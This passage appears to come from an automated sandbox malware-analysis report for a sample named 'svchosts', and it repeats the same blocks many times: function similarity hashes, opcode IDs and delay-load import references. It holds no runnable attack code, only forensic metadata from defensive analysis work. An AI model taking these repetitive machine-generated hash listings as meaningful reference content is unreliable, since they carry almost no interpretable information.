                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 65bc9aec5f1256012d9e9820a5597e076d81ca7f928f419fe960ae0afa7f1dbb
                                                                      • Instruction ID: 771782b854667db32b84ed32047ec90cd589c96eb2dbd2be7f42128fdf0685c7
                                                                      • Opcode Fuzzy Hash: 65bc9aec5f1256012d9e9820a5597e076d81ca7f928f419fe960ae0afa7f1dbb
                                                                      • Instruction Fuzzy Hash: 8DA0029557D5027D311961516D5BD37031CC4C7B52730491DF447D58C1DD8458655831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: efea650962e7386ff27a7e9310320323adc95abfb688f6190e0682462bbaebe9
                                                                      • Instruction ID: 771782b854667db32b84ed32047ec90cd589c96eb2dbd2be7f42128fdf0685c7
                                                                      • Opcode Fuzzy Hash: efea650962e7386ff27a7e9310320323adc95abfb688f6190e0682462bbaebe9
                                                                      • Instruction Fuzzy Hash: 8DA0029557D5027D311961516D5BD37031CC4C7B52730491DF447D58C1DD8458655831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 4b94147654dc32a450ee44e93b62fa0668e3068c6cc2082e9b420de413b7016d
                                                                      • Instruction ID: 771782b854667db32b84ed32047ec90cd589c96eb2dbd2be7f42128fdf0685c7
                                                                      • Opcode Fuzzy Hash: 4b94147654dc32a450ee44e93b62fa0668e3068c6cc2082e9b420de413b7016d
                                                                      • Instruction Fuzzy Hash: 8DA0029557D5027D311961516D5BD37031CC4C7B52730491DF447D58C1DD8458655831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 40499b0f4564810ed868838a850ffb1cc35161343248b33b21a6892b7167f9df
                                                                      • Instruction ID: 771782b854667db32b84ed32047ec90cd589c96eb2dbd2be7f42128fdf0685c7
                                                                      • Opcode Fuzzy Hash: 40499b0f4564810ed868838a850ffb1cc35161343248b33b21a6892b7167f9df
                                                                      • Instruction Fuzzy Hash: 8DA0029557D5027D311961516D5BD37031CC4C7B52730491DF447D58C1DD8458655831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 465f218a18c27d3fd34d4358690c8939f744224ee506c6e54c70e13c0ef5db83
                                                                      • Instruction ID: 771782b854667db32b84ed32047ec90cd589c96eb2dbd2be7f42128fdf0685c7
                                                                      • Opcode Fuzzy Hash: 465f218a18c27d3fd34d4358690c8939f744224ee506c6e54c70e13c0ef5db83
                                                                      • Instruction Fuzzy Hash: 8DA0029557D5027D311961516D5BD37031CC4C7B52730491DF447D58C1DD8458655831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 77b375624f840b0b801d4afcd74751b0fea7878bea7c3c8cfba29d2405cf1175
                                                                      • Instruction ID: 771782b854667db32b84ed32047ec90cd589c96eb2dbd2be7f42128fdf0685c7
                                                                      • Opcode Fuzzy Hash: 77b375624f840b0b801d4afcd74751b0fea7878bea7c3c8cfba29d2405cf1175
                                                                      • Instruction Fuzzy Hash: 8DA0029557D5027D311961516D5BD37031CC4C7B52730491DF447D58C1DD8458655831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002AD8A3
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 32f57690684302a0d8346bbbbf2eda97a6077f3393794f2df00be91ca7f1ac6f
                                                                      • Instruction ID: 771782b854667db32b84ed32047ec90cd589c96eb2dbd2be7f42128fdf0685c7
                                                                      • Opcode Fuzzy Hash: 32f57690684302a0d8346bbbbf2eda97a6077f3393794f2df00be91ca7f1ac6f
                                                                      • Instruction Fuzzy Hash: 8DA0029557D5027D311961516D5BD37031CC4C7B52730491DF447D58C1DD8458655831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002ADAB2
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: d2020236786280523d9931576c08e31008c77f38e81e8fd431a2c965cd5daa1a
                                                                      • Instruction ID: 8a057630c0eb9b44c7818ab4d6050e379fa8dfd471e85a0a6823009fa291b97d
                                                                      • Opcode Fuzzy Hash: d2020236786280523d9931576c08e31008c77f38e81e8fd431a2c965cd5daa1a
                                                                      • Instruction Fuzzy Hash: 77A011AA2BC0823E3008B202AC03E3B022CC0C2B22330820EF00BE088AAC8008280830
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002ADAB2
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 49d450b84cd2d46058b7be698d27896aae507f2832f142f8fa813dc7d5910cb4
                                                                      • Instruction ID: 5b200e961665b6fd60cb5c93efa5dfaecd5fb77a871d08f998e1c7af30a06a59
                                                                      • Opcode Fuzzy Hash: 49d450b84cd2d46058b7be698d27896aae507f2832f142f8fa813dc7d5910cb4
                                                                      • Instruction Fuzzy Hash: BDA001AA2BD182BE31197252AD17E3B026CC4C6B627308A5EF40BD589AAD8459695831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002ADAB2
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: f09820306c6b67b18b73491de1eddd05a15784b2dc445134353a3bde0930addf
                                                                      • Instruction ID: 5b200e961665b6fd60cb5c93efa5dfaecd5fb77a871d08f998e1c7af30a06a59
                                                                      • Opcode Fuzzy Hash: f09820306c6b67b18b73491de1eddd05a15784b2dc445134353a3bde0930addf
                                                                      • Instruction Fuzzy Hash: BDA001AA2BD182BE31197252AD17E3B026CC4C6B627308A5EF40BD589AAD8459695831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002ADAB2
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 0f462d6df2454098c4f4103bab42037b192b0b43d8df18df846ebac661cf8fa9
                                                                      • Instruction ID: 5b200e961665b6fd60cb5c93efa5dfaecd5fb77a871d08f998e1c7af30a06a59
                                                                      • Opcode Fuzzy Hash: 0f462d6df2454098c4f4103bab42037b192b0b43d8df18df846ebac661cf8fa9
                                                                      • Instruction Fuzzy Hash: BDA001AA2BD182BE31197252AD17E3B026CC4C6B627308A5EF40BD589AAD8459695831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002ADAB2
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: daa73b29d495d91178b226180a95cea0d16644524a0733616e29a1472094c090
                                                                      • Instruction ID: 5b200e961665b6fd60cb5c93efa5dfaecd5fb77a871d08f998e1c7af30a06a59
                                                                      • Opcode Fuzzy Hash: daa73b29d495d91178b226180a95cea0d16644524a0733616e29a1472094c090
                                                                      • Instruction Fuzzy Hash: BDA001AA2BD182BE31197252AD17E3B026CC4C6B627308A5EF40BD589AAD8459695831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002ADAB2
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 2fe133799f5b2a7c3e631c673d923533f078e944432b02a4cb2b418d05978866
                                                                      • Instruction ID: 5b200e961665b6fd60cb5c93efa5dfaecd5fb77a871d08f998e1c7af30a06a59
                                                                      • Opcode Fuzzy Hash: 2fe133799f5b2a7c3e631c673d923533f078e944432b02a4cb2b418d05978866
                                                                      • Instruction Fuzzy Hash: BDA001AA2BD182BE31197252AD17E3B026CC4C6B627308A5EF40BD589AAD8459695831
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002ADBD5
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 93878a05b2789f3683d721ab910b5480ea794353db2069c7cecca3c2cf5fcfbd
                                                                      • Instruction ID: 32db86f3fcc07c828c0e0eea3392498751cb3eb41e57210a07f89da2e994b83d
                                                                      • Opcode Fuzzy Hash: 93878a05b2789f3683d721ab910b5480ea794353db2069c7cecca3c2cf5fcfbd
                                                                      • Instruction Fuzzy Hash: 4FA011AA2BC002BE300822802C0BE3B022CC0CAF203308E0EF00BC0880AE800C3A0830
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002ADBD5
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 47e03629701862062c987b0d59a7977401c7e431fc761778b22d4573d1c65172
                                                                      • Instruction ID: 32db86f3fcc07c828c0e0eea3392498751cb3eb41e57210a07f89da2e994b83d
                                                                      • Opcode Fuzzy Hash: 47e03629701862062c987b0d59a7977401c7e431fc761778b22d4573d1c65172
                                                                      • Instruction Fuzzy Hash: 4FA011AA2BC002BE300822802C0BE3B022CC0CAF203308E0EF00BC0880AE800C3A0830
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002ADBD5
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: c56a65d9a1e072196602ad7011cdfe19a06c758802b2113864e4ae301da22853
                                                                      • Instruction ID: 32db86f3fcc07c828c0e0eea3392498751cb3eb41e57210a07f89da2e994b83d
                                                                      • Opcode Fuzzy Hash: c56a65d9a1e072196602ad7011cdfe19a06c758802b2113864e4ae301da22853
                                                                      • Instruction Fuzzy Hash: 4FA011AA2BC002BE300822802C0BE3B022CC0CAF203308E0EF00BC0880AE800C3A0830
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002ADBD5
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
